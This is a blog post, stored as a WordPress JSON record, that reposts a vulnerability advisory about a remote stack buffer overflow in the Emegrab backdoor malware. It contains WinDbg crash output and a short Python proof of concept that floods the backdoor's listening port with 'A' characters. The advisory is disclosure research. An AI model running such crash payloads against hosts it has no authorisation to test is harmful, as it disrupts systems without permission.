{"id":55407,"date":"2024-03-14T17:59:52","date_gmt":"2024-03-14T14:59:52","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177596\/MVID-2024-0675.txt"},"modified":"2024-03-17T10:04:51","modified_gmt":"2024-03-17T06:34:51","slug":"backdoor-win32-emegrab-b-mvid-2024-0675-buffer-overflow","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/backdoor-win32-emegrab-b-mvid-2024-0675-buffer-overflow\/","title":{"rendered":"Backdoor.Win32.Emegrab.b MVID-2024-0675 Buffer Overflow"},"content":{"rendered":"

Discovery \/ credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
\nOriginal source: https:\/\/malvuln.com\/advisory\/19a14d0414aec62ef38378de2e8b259d.txt
\nContact: malvuln13@gmail.com
\nMedia: twitter.com\/malvuln<\/p>\n

Threat: Backdoor.Win32.Emegrab.b
\nVulnerability: Remote Stack Buffer Overflow (SEH)
\nFamily: Emegrab
\nType: PE32
\nMD5: 19a14d0414aec62ef38378de2e8b259d
\nVuln ID: MVID-2024-0675
\nASLR: False
\nDEP: False
\nCFG: False
\nSafe SEH: False
\nDisclosure: 03\/13\/2024
\nDescription: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).<\/p>\n

Memory Dump:
\n(14c0.b6c): Access violation – code c0000005 (first\/second chance not available)
\neax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
\neip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
\n41414141 ?? ???<\/p>\n

0:009> .ecxr
\neax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
\neip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
\n41414141 ?? ???<\/p>\n

0:009> !analyze -v
\n*******************************************************************************
\n* *
\n* Exception Analysis *
\n* *
\n*******************************************************************************<\/p>\n

*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e –<\/p>\n

FAULTING_IP:
\nBackdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
\n0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<\/p>\n

EXCEPTION_RECORD: 260f5de8 — (.exr 0x260f5de8)
\nExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)
\nExceptionCode: c0000005 (Access violation)
\nExceptionFlags: 00000000
\nNumberParameters: 2
\nParameter[0]: 00000001
\nParameter[1]: 26100000
\nAttempt to write to address 26100000<\/p>\n

PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<\/p>\n

ERROR_CODE: (NTSTATUS) 0xc0000005 – The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<\/p>\n

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 – The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<\/p>\n

EXCEPTION_PARAMETER1: 00000008<\/p>\n

EXCEPTION_PARAMETER2: 41414141<\/p>\n

WRITE_ADDRESS: 41414141<\/p>\n

FOLLOWUP_IP:
\nBackdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
\n0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<\/p>\n

FAILED_INSTRUCTION_ADDRESS:
\n+fa2b
\n41414141 ?? ???<\/p>\n

NTGLOBALFLAG: 0<\/p>\n

APPLICATION_VERIFIER_FLAGS: 0<\/p>\n

IP_ON_HEAP: 41414141<\/p>\n

IP_IN_FREE_BLOCK: 41414141<\/p>\n

CONTEXT: 260f5e38 — (.cxr 0x260f5e38)
\neax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74
\neip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc
\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
\nBackdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:
\n0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??
\nResetting default scope<\/p>\n

FAULTING_THREAD: ffffffff<\/p>\n

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<\/p>\n

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<\/p>\n

DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<\/p>\n

LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b<\/p>\n

FRAME_ONE_INVALID: 1<\/p>\n

STACK_TEXT:
\n260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b
\n260fff88 41414141 unknown!printable+0x0
\n260fff8c 41414141 unknown!printable+0x0
\n260fff90 41414141 unknown!printable+0x0
\n260fff94 41414141 unknown!printable+0x0
\n260fff98 41414141 unknown!printable+0x0
\n260fff9c 41414141 unknown!printable+0x0
\n260fffa0 41414141 unknown!printable+0x0
\n260fffa4 41414141 unknown!printable+0x0
\n260fffa8 41414141 unknown!printable+0x0
\n260fffac 41414141 unknown!printable+0x0
\n260fffb0 41414141 unknown!printable+0x0
\n260fffb4 41414141 unknown!printable+0x0
\n260fffb8 41414141 unknown!printable+0x0
\n260fffbc 41414141 unknown!printable+0x0
\n260fffc0 41414141 unknown!printable+0x0
\n260fffc4 41414141 unknown!printable+0x0
\n260fffc8 41414141 unknown!printable+0x0
\n260fffcc 41414141 unknown!printable+0x0
\n260fffd0 41414141 unknown!printable+0x0
\n260fffd4 41414141 unknown!printable+0x0
\n260fffd8 41414141 unknown!printable+0x0
\n260fffdc 41414141 unknown!printable+0x0
\n260fffe0 41414141 unknown!printable+0x0
\n260fffe4 41414141 unknown!printable+0x0
\n260fffe8 41414141 unknown!printable+0x0
\n260fffec 41414141 unknown!printable+0x0
\n260ffff0 41414141 unknown!printable+0x0
\n260ffff4 41414141 unknown!printable+0x0
\n260ffff8 41414141 unknown!printable+0x0
\n260ffffc 41414141 unknown!printable+0x0
\n26100000 41414141 unknown!printable+0x0<\/p>\n

STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb<\/p>\n

SYMBOL_STACK_INDEX: 0<\/p>\n

SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b<\/p>\n

FOLLOWUP_NAME: MachineOwner<\/p>\n

MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d<\/p>\n

IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<\/p>\n

DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e<\/p>\n

FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown<\/p>\n

BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b
\n0:009> !exchain
\n260013fc: ntdll!ExecuteHandler2+44 (775e9d70)
\n260fffcc: 41414141
\nInvalid exception stack at 41414141<\/p>\n

Exploit\/PoC:
\nfrom socket import *<\/p>\n

MALWARE_HOST=”x.x.x.x”
\nPORT=2323
\ns=socket(AF_INET, SOCK_STREAM)
\ns.connect((MALWARE_HOST, PORT))<\/p>\n

PAYLOAD=”A”*666
\ns.send(PAYLOAD.encode())
\ns.close()<\/p>\n

print(“Backdoor.Win32.Emegrab BOF Exploit by Malvuln”)<\/p>\n

Disclaimer: The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<\/p>\n","protected":false},"excerpt":{"rendered":"

Discovery \/ credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https:\/\/malvuln.com\/advisory\/19a14d0414aec62ef38378de2e8b259d.txt Contact: malvuln13@gmail.com Media: twitter.com\/malvuln Threat: Backdoor.Win32.Emegrab.b Vulnerability: Remote Stack Buffer Overflow (SEH) Family: Emegrab Type: PE32 MD5: 19a14d0414aec62ef38378de2e8b259d Vuln ID: MVID-2024-0675 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 03\/13\/2024 Description: The malware listens on TCP port 2323 (typically) however, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55407","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55407","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55407"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55407\/revisions"}],"predecessor-version":[{"id":55471,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55407\/revisions\/55471"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55407"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55407"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55407"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}